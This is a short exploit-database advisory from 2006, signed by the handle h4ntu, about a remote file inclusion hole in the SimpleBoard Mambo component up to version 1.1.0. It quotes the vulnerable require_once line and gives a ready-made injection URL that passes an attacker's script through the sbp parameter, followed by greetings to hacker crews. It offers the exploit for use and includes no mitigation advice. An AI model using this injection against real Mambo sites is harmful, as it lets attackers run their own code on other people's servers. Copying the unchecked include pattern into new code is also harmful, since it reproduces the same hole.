id: 569
date: 07/07/2006
title: SimpleBoard Mambo Component <= 1.1.0 Remote Include Vulnerability
author: h4ntu
cves: 

=================================================================
SimpleBoard Mambo Component <= 1.1.0 Remote Include Vulnerability
=================================================================



Bug Found by h4ntu [http://h4ntu.com] #batamhacker crew
Another Mambo component remote inclusion vulneribility

download : http://mamboxchange.com/frs/download.php/6920/Simpleboard-1.1.0-Stable.zip
bug found in file file_upload.php :

require_once("$sbp/sb_helpers.php");
inject :
http://website.com/components/com_simpleboard/image_upload.php?sbp=[evil_script]


Greetz : Baylaw, Reel, JoySolutions, K-159, SaMuR4i_X, SolpoT, Nugelo,
and all #batamhacker [at] dalnet crew, #mardongan, #motha, #papmahackerlink 



#  0day.today [2023-03-21]  #